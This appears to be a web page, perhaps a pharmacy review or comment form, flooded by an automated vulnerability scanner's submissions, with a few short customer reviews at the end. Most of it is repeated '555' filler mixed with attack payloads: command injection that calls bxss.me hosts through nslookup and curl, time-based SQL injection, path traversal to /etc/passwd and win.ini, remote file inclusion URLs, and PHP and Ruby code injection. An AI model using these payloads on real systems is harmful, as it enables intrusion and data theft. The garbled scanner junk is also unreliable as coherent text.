555
555
555
555
555
555
555
555
555
555
555
gethostbyname(lc(‘hitnh’.’avoqfkom4259d.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(105).chr(78).chr(103).chr(79)
555
“.gethostbyname(lc(“hitxp”.”imhqeqsud3eec.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(118).chr(85).chr(108).chr(79).”
555
555
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitxlzlrawjkpdeb11.bxss.me||curl${IFS}hitxlzlrawjkpdeb11.bxss.me)&'”`0&(nslookup${IFS}-q${IFS}cname${IFS}hitxlzlrawjkpdeb11.bxss.me||curl${IFS}hitxlzlrawjkpdeb11.bxss.me)&`’
‘.gethostbyname(lc(‘hitfr’.’gsluzknj4dcc4.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(105).chr(70).chr(108).chr(87).’
555
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitytqzteyzwrfe8bd.bxss.me||curl${IFS}hitytqzteyzwrfe8bd.bxss.me)
;(nslookup -q=cname hitrwgmabjsdta45e2.bxss.me||curl hitrwgmabjsdta45e2.bxss.me)|(nslookup -q=cname hitrwgmabjsdta45e2.bxss.me||curl hitrwgmabjsdta45e2.bxss.me)&(nslookup -q=cname hitrwgmabjsdta45e2.bxss.me||curl hitrwgmabjsdta45e2.bxss.me)
`(nslookup -q=cname hitnivfjsisvsa23e1.bxss.me||curl hitnivfjsisvsa23e1.bxss.me)`
555
555
|(nslookup -q=cname hitfvkanlsvcg68bfa.bxss.me||curl hitfvkanlsvcg68bfa.bxss.me)
555
<!–
555
&(nslookup -q=cname hitnieipolurb375eb.bxss.me||curl hitnieipolurb375eb.bxss.me)&'”`0&(nslookup -q=cname hitnieipolurb375eb.bxss.me||curl hitnieipolurb375eb.bxss.me)&`’
‘”
555
555
555
&nslookup -q=cname hittalttwnvxl279f1.bxss.me&'”`0&nslookup -q=cname hittalttwnvxl279f1.bxss.me&`’
555
555
$(nslookup -q=cname hitmwbltqiykmd9dc2.bxss.me||curl hitmwbltqiykmd9dc2.bxss.me)
555
555
555
555
(nslookup -q=cname hitjipfjrxzkya22f1.bxss.me||curl hitjipfjrxzkya22f1.bxss.me))
555
expr 9000848272 – 949218
555
555|echo myyxtj$() xxwggznz^xyu||a #’ |echo myyxtj$() xxwggznz^xyu||a #|” |echo myyxtj$() xxwggznz^xyu||a #
555
|echo zbslro$() eianjmnz^xyu||a #’ |echo zbslro$() eianjmnz^xyu||a #|” |echo zbslro$() eianjmnz^xyu||a #
555&echo jsxcyb$() vwrbynnz^xyu||a #’ &echo jsxcyb$() vwrbynnz^xyu||a #|” &echo jsxcyb$() vwrbynnz^xyu||a #
555
555
555
555
555
&echo qdfqin$() vyhdyinz^xyu||a #’ &echo qdfqin$() vyhdyinz^xyu||a #|” &echo qdfqin$() vyhdyinz^xyu||a #
555
echo jakzrf$() synzztnz^xyu||a #’ &echo jakzrf$() synzztnz^xyu||a #|” &echo jakzrf$() synzztnz^xyu||a #
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
http://bxss.me/t/fit.txt.jpg
555
555
Http://bxss.me/t/fit.txt
bxss.me/t/rfi.php?
555
bxss.me
555
http://bxss.me/t/rfi.php?
bxss.me/t/xss.html?
c:/windows/win.ini
555
HttP://bxss.me/t/xss.html?
555
../../../../../../../../../../../../../../etc/shells
/etc/shells
555
555
555
555
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
(select 198766*667891 from DUAL)
555
(select 198766*667891)
@@yq5V2
555
555
555
555
555
555′”
555
../555
555
555
555
file:///etc/passwd
555
(select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15) from dual)
555
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
../../../../../../../../../../../../../../windows/win.ini
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
../../../../../../../../../../../../../../etc/passwd
555
5552zQmZagg’)) OR 789=(SELECT 789 FROM PG_SLEEP(15))–
555Li5lXmLI’) OR 257=(SELECT 257 FROM PG_SLEEP(15))–
555
555
555
555
555
555d4LZO7cx’ OR 735=(SELECT 735 FROM PG_SLEEP(15))–
555
555
555
555
555
555-1)) OR 719=(SELECT 719 FROM PG_SLEEP(15))–
555
555-1) OR 108=(SELECT 108 FROM PG_SLEEP(15))–
555
555
555
555-1 OR 430=(SELECT 430 FROM PG_SLEEP(15))–
555
555
555
555
555CuiyfCGC’; waitfor delay ‘0:0:15’ —
555
555
555
555-1 waitfor delay ‘0:0:15’ —
555
555
555
555-1); waitfor delay ‘0:0:15’ —
555
555
555-1; waitfor delay ‘0:0:15’ —
555
555
555
555
555
555
555
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
555
5550″XOR(555*if(now()=sysdate(),sleep(15),0))XOR”Z
555
555
5550’XOR(555*if(now()=sysdate(),sleep(15),0))XOR’Z
555
555
555*if(now()=sysdate(),sleep(15),0)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
‘A’.concat(70-3).concat(22*4).concat(116).concat(75).concat(100).concat(89)+(require’socket’
Socket.gethostbyname(‘hitjf’+’oreicuja89fe2.bxss.me.’)[3].to_s)
555
555
555
555
555
555
555
555
‘+’A’.concat(70-3).concat(22*4).concat(102).concat(80).concat(115).concat(71)+(require’socket’
Socket.gethostbyname(‘hitqj’+’zevggotv024ea.bxss.me.’)[3].to_s)+’
555
555
“+”A”.concat(70-3).concat(22*4).concat(98).concat(90).concat(104).concat(73)+(require”socket”
Socket.gethostbyname(“hitoz”+”alfrgasx4c511.bxss.me.”)[3].to_s)+”
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555″||sleep(27*1000)*kogfnc||”
555
555
555’||sleep(27*1000)*ewnwsj||’
555″&&sleep(27*1000)*xyutfm&&”
555’&&sleep(27*1000)*rsjctc&&’
555
555
‘”()
555
555
555
Array
555
Array
555
555
555
555
Array
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
${10000458+9999489}
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555

555
555
555
555

555
555
555
555
555
555
555
555
555
555
555
555
redirtest.acx
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
^(#$!@#$)(()))******
555
!(()&&!|*|*|
)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1LDKRVYNC8F0
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
[php]print(md5(31337));[/php]
555
555
555
{php}print(md5(31337));{/php}
print(md5(31337));//
555
‘{${print(md5(31337))}}’
555
555
555
555
555
555
555
‘.print(md5(31337)).’
“+response.write(9156588*9127695)+”
${@print(md5(31337))}
555
555
‘+response.write(9156588*9127695)+’
${@print(md5(31337))}
response.write(9156588*9127695)
“;print(md5(31337));$a=”
555
555
‘;print(md5(31337));$a=’
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
(select 198766*667891 from DUAL)
555
555
555
(select 198766*667891)
555
555
555
555
@@DkHjb
555
555
555
555′”
555
555
555
555
555
555
(select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15) from dual)
555
555
555
555
555
555
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
555
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555T4x8pRqp’)) OR 369=(SELECT 369 FROM PG_SLEEP(15))–
555YpYizD6T’) OR 89=(SELECT 89 FROM PG_SLEEP(15))–
555
555yQKpBjyK’ OR 50=(SELECT 50 FROM PG_SLEEP(15))–
555-1)) OR 682=(SELECT 682 FROM PG_SLEEP(15))–
555
555-1) OR 978=(SELECT 978 FROM PG_SLEEP(15))–
555
555-1 OR 795=(SELECT 795 FROM PG_SLEEP(15))–
<!–
555XZoEOlWh’; waitfor delay ‘0:0:15’ —
‘”
555
555-1 waitfor delay ‘0:0:15’ —
555
555-1); waitfor delay ‘0:0:15’ —
555
555
555-1; waitfor delay ‘0:0:15’ —
555
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
5550″XOR(555*if(now()=sysdate(),sleep(15),0))XOR”Z
555
555
555
555
555
http://bxss.me/t/fit.txt.jpg
5550’XOR(555*if(now()=sysdate(),sleep(15),0))XOR’Z
555*if(now()=sysdate(),sleep(15),0)
555
555
Http://bxss.me/t/fit.txt
555
555
bxss.me
555
555
555
555
c:/windows/win.ini
../../../../../../../../../../../../../../etc/shells
555
555
555
“.gethostbyname(lc(“hithi”.”qiqmmgxw06a5d.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(118).chr(66).chr(121).chr(85).”
/etc/shells
555
gethostbyname(lc(‘hitzm’.’pyjeamir89290.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(120).chr(83).chr(103).chr(73)
‘.gethostbyname(lc(‘hitue’.’mqgzvsmue8408.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(102).chr(68).chr(100).chr(85).’
555
555
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
555
555
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
555
555
555
555
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitebpuavmvop30d1f.bxss.me||curl${IFS}hitebpuavmvop30d1f.bxss.me)&'”`0&(nslookup${IFS}-q${IFS}cname${IFS}hitebpuavmvop30d1f.bxss.me||curl${IFS}hitebpuavmvop30d1f.bxss.me)&`’
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitbfkaupvmrve4c45.bxss.me||curl${IFS}hitbfkaupvmrve4c45.bxss.me)
555
;(nslookup -q=cname hitfmrsdbefai0528f.bxss.me||curl hitfmrsdbefai0528f.bxss.me)|(nslookup -q=cname hitfmrsdbefai0528f.bxss.me||curl hitfmrsdbefai0528f.bxss.me)&(nslookup -q=cname hitfmrsdbefai0528f.bxss.me||curl hitfmrsdbefai0528f.bxss.me)
555
555
`(nslookup -q=cname hitsftpkgzcuj3b82d.bxss.me||curl hitsftpkgzcuj3b82d.bxss.me)`
555
555
555
555
|(nslookup -q=cname hitjczvcvgzyked5e3.bxss.me||curl hitjczvcvgzyked5e3.bxss.me)
&(nslookup -q=cname hitozmggvdbsr6a583.bxss.me||curl hitozmggvdbsr6a583.bxss.me)&'”`0&(nslookup -q=cname hitozmggvdbsr6a583.bxss.me||curl hitozmggvdbsr6a583.bxss.me)&`’
555
555
555
555
&nslookup -q=cname hitctbeitrpnmf2384.bxss.me&'”`0&nslookup -q=cname hitctbeitrpnmf2384.bxss.me&`’
555
555
555
555
555
$(nslookup -q=cname hithuoufgydoz5549a.bxss.me||curl hithuoufgydoz5549a.bxss.me)
555
555
555
(nslookup -q=cname hitvslblhusurd3c8a.bxss.me||curl hitvslblhusurd3c8a.bxss.me))
555
555
555
bxss.me/t/rfi.php?
555
expr 9000668167 – 949105
555
555
http://bxss.me/t/rfi.php?
555|echo dvvzep$() cnsspbnz^xyu||a #’ |echo dvvzep$() cnsspbnz^xyu||a #|” |echo dvvzep$() cnsspbnz^xyu||a #
555
555
555
555
555
|echo hvptgl$() rrhijunz^xyu||a #’ |echo hvptgl$() rrhijunz^xyu||a #|” |echo hvptgl$() rrhijunz^xyu||a #
bxss.me/t/xss.html?
555&echo tzwqlf$() bujjqbnz^xyu||a #’ &echo tzwqlf$() bujjqbnz^xyu||a #|” &echo tzwqlf$() bujjqbnz^xyu||a #
555
555
555
HttP://bxss.me/t/xss.html?
555
555
555
555
555
&echo lqhsna$() hhjapdnz^xyu||a #’ &echo lqhsna$() hhjapdnz^xyu||a #|” &echo lqhsna$() hhjapdnz^xyu||a #
echo mubvns$() ozbbwtnz^xyu||a #’ &echo mubvns$() ozbbwtnz^xyu||a #|” &echo mubvns$() ozbbwtnz^xyu||a #
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
../555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
file:///etc/passwd
555
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
‘A’.concat(70-3).concat(22*4).concat(122).concat(88).concat(99).concat(82)+(require’socket’
Socket.gethostbyname(‘hitgj’+’qvfhsyewd657b.bxss.me.’)[3].to_s)
555
‘+’A’.concat(70-3).concat(22*4).concat(121).concat(72).concat(119).concat(80)+(require’socket’
Socket.gethostbyname(‘hitlx’+’sjshlehuf4904.bxss.me.’)[3].to_s)+’
555
“+”A”.concat(70-3).concat(22*4).concat(111).concat(73).concat(100).concat(77)+(require”socket”
Socket.gethostbyname(“hitny”+”oqeeelse695c8.bxss.me.”)[3].to_s)+”
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
${9999182+10000260}
555
555
555
Array
555
555
555
12345′”‘”);|]*{‘💡
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555’||sleep(27*1000)*sbdmqx||’
555
555″||sleep(27*1000)*soyqwz||”
555
555
555
555
555″&&sleep(27*1000)*isnzby&&”
555
555
555’&&sleep(27*1000)*tgarlh&&’
555
‘”()
555
555
Array
555
Array
555
555
555
555
Array
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
^(#$!@#$)(()))******
!(()&&!|*|*|
555
555
)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555

555
555
555
555

555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
redirtest.acx
555
555
555
555
555
555
555
555
1KNNFERTB5D0
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
djjx2e
Awesome experience. I am very happy this phamacy. Great customer service, all my question was answered. Promt transaction followed by quick delivery. I absoluteley recomemend. Thanks again!

Vikam Gaur provided great customer service. I highly recommend him. The products were here in a timely manner. Thank you

Great service and fast delivery. Will definitely use again.
Awesome service!
Quick delivery as well.
Definitely recommend
Required